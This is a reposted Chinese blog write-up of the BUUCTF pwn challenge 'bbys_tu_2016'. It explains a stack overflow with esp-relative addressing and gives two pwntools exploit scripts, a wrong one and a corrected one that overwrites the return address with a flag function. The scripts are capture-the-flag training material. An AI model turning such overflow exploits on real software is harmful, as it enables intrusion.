欢迎访问 生活随笔!

生活随笔

当前位置: 首页 >

[BUUCTF-pwn]——bbys_tu_2016

发布时间:2024/4/17 47 豆豆
生活随笔 收集整理的这篇文章主要介绍了 [BUUCTF-pwn]——bbys_tu_2016 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

[BUUCTF-pwn]——bbys_tu_2016

简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节

error exploit

from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(flag) p.sendline(payload) p.interactive()

right exploit

from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0x14 + 4) + p32(flag) p.sendline(payload) p.interactive()

总结

以上是生活随笔为你收集整理的[BUUCTF-pwn]——bbys_tu_2016的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。